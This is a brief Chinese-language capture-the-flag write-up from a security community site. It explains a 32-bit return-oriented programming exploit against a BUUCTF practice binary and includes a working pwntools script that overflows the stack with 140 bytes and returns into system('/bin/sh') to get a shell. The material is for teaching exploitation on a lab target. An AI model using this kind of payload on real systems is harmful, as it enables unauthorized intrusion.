32 位 ROP！！！ - 侠者安全社区

32 位 ROP

话不多说，直接上题（BUUCTF）

32位 IDA 反编译

啊哈，一眼存在栈溢出

查看内存需 140 个字节覆盖

Shift + F12 查看字符串，有可利用函数与字符串，构造 ROP

在 plt 表中拿到 system 地址

32 位中调用 system 函数时需要传入一个将来的返回地址，这个返回地址随意，但必须要有，返回地址后面则是参数

from pwn import *

p = remote('node5.buuoj.cn',29920)

binsh = 0x0804a024
system = 0x08048320

p.recvuntil('Input:\n')

payload = b'a' * 140 + p32(system) + p32(0) + p32(binsh)

p.sendline(payload)
p.interactive()

成功拿到 flag

版权声明 1、本站唯一名称： 侠者安全社区
2、本站永久网址：https://www.xiasec.com
3、本网站的文章部分内容可能来源于网络，仅供大家学习与参考，如有侵权，请联系站长VXfreek0x00进行删除处理。
4、本站一切资源不代表本站立场，并不代表本站赞同其观点和对其真实性负责。
5、本站一律禁止以任何方式发布或转载任何违法的相关信息，访客发现请向站长举报
6、本站资源大多存储在云盘，如发现链接失效，请联系我们我们会第一时间更新。

THE END

二进制安全